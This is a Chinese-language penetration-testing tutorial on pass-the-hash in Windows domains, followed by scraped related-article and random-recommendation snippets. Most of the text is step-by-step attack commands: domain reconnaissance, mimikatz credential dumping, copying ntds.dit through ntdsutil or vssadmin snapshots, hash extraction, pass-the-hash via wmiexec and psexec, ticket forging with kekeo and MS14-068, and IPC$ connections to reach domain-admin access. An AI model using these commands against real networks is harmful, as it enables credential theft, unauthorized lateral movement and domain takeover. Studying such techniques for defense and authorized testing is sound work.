内网hash传递
前言:
我们在平常打点的时候,遇到有内网或者有域的环境的时候,我们只获得了内网中的一台机子的shell,由这台机子我们可以获得这台机子所在的网段的相关其他主机。比如说有域的时候的域控机,有多层内网的堡垒机等,下面将介绍如何用已控制的内网机拿到域控的方法。
0x00 环境
假如是一个域环境:
域控: 192.168.106.129 已经控制的内网机: 192.168.106.120
其他假如存在一些其他普通的机子。
0x01 内网信息收集
初步的查看网络信息:
ipconfig /all
netstat -ano
arp -a
这就可以查看到是否存在内网
查看是否有域:net user /domain(查看所有域用户)
如果有域,那么收集域内主机信息:
net view #查看域中的机器
net view /domain # 查看网络中有哪些域
net view /domain:domainhack # 查看 domainhack 域中的机器
然后通过 ping 机器名 可以获取 ip
查找域控的几种方法:
dsquery server
net time /domain
ipconfig /all 查看 dns 信息
端口扫描,域控服务器会开放389端口,如果和DNS同服务器,那么也会有53
net group “domain controllers” /domain 得到域控制器主机名
net group “domain admins” /domain 查询域管理用户
0x02 抓取明文&&hash
利用mimikatz抓取登录过的明文,也可获取到ntlm_hash:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
获取ntlm hash
直接获取hash:
mimikatz.exe "privilege::debug" "sekurlsa::ekeys"
获取aes等hash,如果捕获不到ntlm hash,那么就使用这条命令捕获
0x03导出 ntds.dit获取hash
方法一 ntdsutil:
ntdsutil snapshot "List All" quit quit # 列举快照
ntdsutil snapshot "activate instance ntds" create quit quit # 创建快照
ntdsutil snapshot "mount {77e43351-f29c-4bb2-86ad-cc6b7610589d}" # 挂载快照
copy C:\$SNAP_201803152221_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit #复制
ntds.dit
方法二 vssadmin:
vssadmin list shadows # 查询当前系统的快照
vssadmin create shadow /for=c: #创建快照
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\ntds.dit # 复制ntds.dit
vssadmin delete shadows /for=c: /quiet #删除快照
导出ntds.dit后:
获取 system.hiv:
reg save hklm\system system.hiv
QuarksPwDump.exe 导出 hash:
QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit --system-file system.hiv
0x04 pass-the-hash 攻击
1.mimikatz:
mimikatz.exe
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0
如果是win2008之后只能抓取到aes hash值,那么将上面的ntlm 改成aes
2.wmiexec
下载地址:https://github.com/maaaaz/impacket-examples-windows
wmiexec -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 domainhack/Administrator@192.168.106.129 "whoami"
domainhack 为域名
Administrator 域用户
192.168.106.129 目标 IP
3.psexec
psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 domainhack/Administrator@192.168.106.129 "whoami"
0x05 pass-the-ticket攻击(票据)
mimikatz清除票据:
为了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除,清除方法使用mimikatz
mimikatz.exe "kerberos::list" "kerberos::purge"
1.wce
要求:
域用户名 ,hash (用前面的方法获取)本机 administor 权限
用法:
wce -s Administrator::AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09
2.keko
下载地址:
https://github.com/gentilkiwi/kekeo
要求:
域用户名 ,hash (用前面的方法获取),域名
用法:
生成票据
kekeo "tgt::ask /user:Administrator /domain:domainhack.com /ntlm:A812E6C2DEFCB0A7B80868F9F3C88D09"
导入票据
kekeo "kerberos::ptt TGT_Administrator@DOMAINHACK.COM_krbtgt~domainhack.com@DOMAINHACK.COM.kirbi"
3.ms14-068.exe
下载地址:
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS14-068/MS14-068.exe
要求:
域用户名 , 密码
用户sid # whoami /all 获取
用法:
生成 票据
ms14-.exe -u hacker@domainhack.com -s S------- -d 192.168.106.129 -p qaz123!@#
ms14-.exe -u 域用户@域名.com -s 用户sid -d 域控ip地址 -p 用户名密码
导入票据
Mimikatz.exe "kerberos::ptc TGT_hacker@domainhack.com.ccache"
导入票据后就相当于有了 域管理员的权限, 直接添加域管理员
写入成功后,使用PsExec.exe以管理员权限运行连接域控
psexec64.exe \\域控主机名 cmd.exe
https://www.cnblogs.com/feizianquan/archive/2019/10/29/11760564.html
0x06 ipc攻击
域控开了ipc共享的话,直接ipc也可以连接登录,如果是xp系统的话用户秘密都不要
net view 192.168.211.130 #查看共享
net use \\192.168.211.130\ipc$ "password" /user:"user" # ipc$ 连接
内网hash传递的更多相关文章
- [内网渗透]HASH获取与HASH传递
0x01 PTH简介 PTH,即Pass-The-Hash,首先我们来说下为什么要使用HASH传递,一是在目标机>=win server 2012时,lsass.exe进程中是抓不到明文密码的, ...
- 内网技巧-通过SAM数据库获得本地用户hash的方法
内网技巧-通过SAM数据库获得本地用户hash的方法 在windows上的C:\Windows\System32\config目录保存着当前用户的密码hash.我们可以使用相关手段获取该hash. 提 ...
- PtH(hash传递攻击)原理探秘
背景知识 Windows 横向渗透的两种方式 1.hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH: 2.ticket传递攻击,通过传递kerberos的ticket,登录机器,简称 ...
- 内网渗透bypassuac和smb溢出
对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录 环境大致如下 拥有shell权限的win7(有uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp 先对有权限的 ...
- Redis利用,攻击内网(ssrf)
Redis语法 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统. Redis是一个开源的使用ANSI C ...
- 内网渗透-windows认证
前言:全国HW刚结束,加强一波内网概念,去年11月红队成绩并不理想,这次必拿下好成绩.冲!!! 0x00 本地认证 本地认证基础知识 在本地登录Windows的情况下,操作系统会使用用户输入的密码作为 ...
- 内网渗透-横向移动($IPC&at&schtasks)
内网渗透-横向移动 #建立ipc连接并将后门添加至计划任务 前置条件:获取到某域主机权限->得到明文或者hash,通过信息收集到的用户列表当做用户名字典->用得到的密码明文当做密码字典 本 ...
- 【CTF】msf和impacket联合拿域控内网渗透-拿域控
前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也 ...
- 内网渗透测试思路-FREEBUF
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...
随机推荐
- Go语言实现:【剑指offer】树的子结构
该题目来源于牛客网<剑指offer>专题. 输入两棵二叉树A,B,判断B是不是A的子结构.(ps:我们约定空树不是任意一个树的子结构) Go语言实现: type TreeNode stru ...
- 【基础】CodeBlocks调试器基本使用方法
CodeBlocks是一个开放源码的全功能的跨平台C/C++集成开发环境. 下载地址:http://www.codeblocks.org/downloads/26 其中,Windows环境下可以使用 ...
- js引入,js变量和运算符等
页面级的js不管写在页面的哪里都可以 企业项目开发要求:结构(html),样式(css),行为(js)相分离 不要既写外部js,又写内部js:如果两个都写,则外部js生效 声明多个变量时,每个变量之间 ...
- 13-MyBatis03(逆向工程)
MyBatis逆向工程 1.导入jar包 <dependency> <groupId>org.mybatis</groupId> <artifactId> ...
- Angular目录结构
一. Angular目录结构 e2e:在e2e/下是端到端测试 node_modules:安装的第三方模块都在这,使用npm install安装的1 Src:我们项目的所有文件 { App:组件,以a ...
- 珠峰-node
##### 文件流的读写. ##### 文件流对pipe的封装. ####
- 实验一 GIT 代码版本管理
实验一 GIT 代码版本管理 实验目的: 1)了解分布式分布式版本控制系统的核心机理: 2)熟练掌握git的基本指令和分支管理指令: 实验内容: 1)安装git 2)初始配置git ,git ini ...
- python基础入门之四 —— 列表
1.格式 [数据1,数据2,数据3,...] 列表可以一次性存多个数据,可以为不同的数据类型 2.下标 从0开始循序向下分配 3.常用函数 查找 index():返回指定数据所在位置下标,不存在就报错 ...
- 浏览器中常见的html语义化标签
html标签默认在浏览器中展示的样式,html标签的用途:语义化(明白每个标签的用途,在什么情况下使用此标签合理);标签语义化好处:1.更容易被搜索引擎收录2.更容易让屏幕阅读器读出网页内容. 网页上 ...
- 聊聊GIS数据的四个分层与GIS服务
本篇不讨论矢量栅格数据的结构,也不讨论矢量与栅格的区别(即设定读者有这方面的基础). 版权声明:原创.博客园/B站/小专栏/知乎/CSDN @秋意正寒 转载请标注原地址并声明转载: https://w ...